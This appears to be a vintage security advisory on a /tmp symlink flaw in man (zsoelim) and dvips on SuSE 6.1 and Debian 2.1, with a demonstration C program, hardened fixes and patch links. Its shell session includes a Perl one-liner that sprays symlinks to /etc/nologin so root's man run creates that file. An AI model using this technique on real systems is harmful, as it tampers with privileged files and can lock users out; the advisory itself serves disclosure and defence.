COMMAND

    man, dvips

SYSTEMS AFFECTED

    SuSE Linux 6.1, Debian GNU/Linux 2.1

PROBLEM

    Thomas Fischbacher found the following.  With SuSE Linux 6.1 there
    are still a few programs around which blindly create files in /tmp
    regardless of whether a symlink or something similarly evil already
    exists in that place.  Among these programs are 'man' and 'dvips'.
    Though it seems to be impossible by now to overwrite /etc/passwd
    with a plain simple /tmp/zman01234aaa symlink (didn't check if the
    source is race-condition free, though), one can still create
    arbitrary files which do funny things.  Example (emacs -- M-x
    shell):

        brauneck:~ # whoami
        root
        brauneck:~ # cd /tmp
        brauneck:/tmp # cat /etc/SuSE-release
        SuSE Linux 6.1 (i386)
        VERSION = 6.1
        brauneck:/tmp # rpm -q man
        man-2.3.10-62
        brauneck:/tmp # md5sum /usr/bin/man
        b383967ce695352002f077680e375c62  /usr/bin/man
        brauneck:/tmp # su tf
        tf@brauneck:/tmp > export LS_OPTIONS=''
        tf@brauneck:/tmp > export LS_COLORS=''
        tf@brauneck:/tmp > ls zman*
        ls: zman*: No such file or directory
        tf@brauneck:/tmp > /bin/bash -c "echo $$"
        6056
        tf@brauneck:/tmp > # this gives me a current pid range
        tf@brauneck:/tmp > perl -e 'for($i=6000;$i<7000;$i++){symlink "/etc/nologin", "/tmp/zman0${i}aaa";}'
        tf@brauneck:/tmp > ls -l /tmp/zman06123aaa
        lrwxrwxrwx   1 tf       stud           12 Jun  4 16:28 /tmp/zman06123aaa -> /etc/nologin
        tf@brauneck:/tmp > ls -l /etc/nologin
        ls: /etc/nologin: No such file or directory
        tf@brauneck:/tmp > exit
        brauneck:/tmp # man mmap
        Reformatting mmap(2), please wait...
        WARNING: terminal is not fully functional

        -  (press RETURN)



        MMAP(2)             Linux Programmer's Manual             MMAP(2)


        NAME
               mmap, munmap - map or unmap files or devices into memory

        SYNOPSIS
               #include <unistd.h>
               #include <sys/mman.h>

               #ifdef _POSIX_MAPPED_FILES

               void  *  mmap(void  *start,  size_t length, int prot , int
               flags, int fd, off_t offset);

               int munmap(void *start, size_t length);

               #endif

        DESCRIPTION

         Manual page mmap(2) line 1q

        brauneck:/tmp # brauneck:/tmp #
        brauneck:/tmp # ls -la /etc/nologin
        -rw-r--r--   1 root     root         4319 Jun  4 16:30 /etc/nologin
        brauneck:/tmp # ls /tmp/zman0* | wc -l
            999
        brauneck:/tmp # # Note that one link was removed!
        brauneck:/tmp #
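    The session above shows the whole defect: man's helper creates a
    temporary file under a name that an unprivileged user can predict
    (zman0<pid>aaa), and the open() follows whatever symlink is already
    sitting at that path.  The following C program is an added
    illustration written for this page; it is not code from man, zsoelim
    or the SuSE/Debian fixes.  It reproduces the advisory's outcome in a
    directory of your choosing (a dangling link named like the man
    temporary file, pointing at a constructed "nologin-demo" target
    instead of /etc/nologin), then shows the two hardened variants:
    open() with O_CREAT|O_EXCL|O_NOFOLLOW, which refuses to go through
    the planted link, and mkstemp(), which picks an unpredictable name
    and creates it atomically.  All file names and the helper functions
    are assumptions made for the demonstration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Unsafe pattern from the advisory: predictable name, and an open() that
 * follows whatever symlink an attacker planted there beforehand. */
int open_tmp_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened open: O_EXCL fails if anything (even a dangling symlink) already
 * exists at the path; O_NOFOLLOW refuses to follow a symlink in the final
 * component.  Returns an fd, or -1 with errno set. */
int open_tmp_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed setup mimicking /tmp/zman0NNNNaaa -> /etc/nologin: plants a
 * dangling link "<dir>/zman0<pid>aaa" pointing at "<dir>/nologin-demo-<pid>".
 * Returns 1 on success, 0 if the link could not be created. */
static int plant_link(const char *dir, char *link, char *target, size_t n)
{
    snprintf(link, n, "%s/zman0%daaa", dir, (int)getpid());
    snprintf(target, n, "%s/nologin-demo-%d", dir, (int)getpid());
    unlink(link);
    unlink(target);
    return symlink(target, link) == 0;
}

/* The advisory's outcome: the unsafe open follows the planted link and the
 * target file springs into existence.  Returns 1 if that happened. */
int demo_symlink_followed(const char *dir)
{
    char link[256], target[256];
    struct stat st;
    int created = 0;
    if (!plant_link(dir, link, target, sizeof link))
        return 0;
    int fd = open_tmp_unsafe(link);
    if (fd >= 0) {
        if (write(fd, "demo\n", 5) < 0) { /* content is irrelevant here */ }
        close(fd);
        created = (stat(target, &st) == 0 && S_ISREG(st.st_mode));
    }
    unlink(link);
    unlink(target);
    return created;
}

/* Same planted link, hardened open: open() must fail (EEXIST from O_EXCL or
 * ELOOP from O_NOFOLLOW) and the target must never be created.  Returns 1
 * if both hold. */
int demo_symlink_refused(const char *dir)
{
    char link[256], target[256];
    struct stat st;
    if (!plant_link(dir, link, target, sizeof link))
        return 0;
    int fd = open_tmp_safe(link);
    int refused = (fd < 0 && (errno == EEXIST || errno == ELOOP));
    if (fd >= 0)
        close(fd);
    int target_absent = (lstat(target, &st) != 0 && errno == ENOENT);
    unlink(link);
    unlink(target);
    return refused && target_absent;
}

/* Preferred fix: mkstemp() chooses an unpredictable name and creates it
 * atomically with O_CREAT|O_EXCL, mode 0600.  Returns 1 if the fd is a
 * regular file with no group/other permission bits. */
int demo_mkstemp(const char *dir)
{
    char tmpl[256];
    struct stat st;
    snprintf(tmpl, sizeof tmpl, "%s/zmanXXXXXX", dir);
    int fd = mkstemp(tmpl);
    if (fd < 0)
        return 0;
    int ok = (fstat(fd, &st) == 0 && S_ISREG(st.st_mode)
              && (st.st_mode & 077) == 0);
    close(fd);
    unlink(tmpl);
    return ok;
}

int main(void)
{
    printf("unsafe open followed planted link: %d\n", demo_symlink_followed("/tmp"));
    printf("hardened open refused the link:    %d\n", demo_symlink_refused("/tmp"));
    printf("mkstemp gave a private file:       %d\n", demo_mkstemp("/tmp"));
    return 0;
}
```

    The demo creates and follows the link as the same user, so it runs
    unchanged on current kernels.  Note for anyone auditing a system
    rather than a program: Linux 3.6 and later ship the
    fs.protected_symlinks sysctl, which refuses to follow a symlink in a
    world-writable sticky directory such as /tmp unless the follower's
    uid matches the link owner or the directory owner.  That would have
    stopped root's man from following tf's link in the session above,
    but it is a mitigation layered on top of, not a substitute for,
    O_EXCL/O_NOFOLLOW or mkstemp() in the program itself.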

SOLUTION

    SuSE confirmed  the link  vulnerability in  the man  package.   The
    culprit is  zsoelim which  creates the  file without  looking left
    and right.   All Linux  distributions using  man 2.3.10  should be
    affected.  A fixed package from us will be available soon.

    Debian GNU/Linux 2.1 has  a vulnerability in the  zsoelim program:
    it is  vulnerable to  a symlink  attack.   This has  been fixed in
    version 2.3.10-69FIX.1:

        http://security.debian.org/dists/stable/updates/source/man-db_2.3.10-69FIX.1.diff.gz
        http://security.debian.org/dists/stable/updates/source/man-db_2.3.10-69FIX.1.dsc
        http://security.debian.org/dists/stable/updates/source/man-db_2.3.10.orig.tar.gz

        http://security.debian.org/dists/stable/updates/binary-alpha/man-db_2.3.10-69FIX.1_alpha.deb

        http://security.debian.org/dists/stable/updates/binary-i386/man-db_2.3.10-69FIX.1_i386.deb

        http://security.debian.org/dists/stable/updates/binary-m68k/man-db_2.3.10-69FIX.1_m68k.deb

        http://security.debian.org/dists/stable/updates/binary-sparc/man-db_2.3.10-69FIX.1_sparc.deb

        ftp://ftp.debian.org/debian/dists/stable/*/binary-$arch/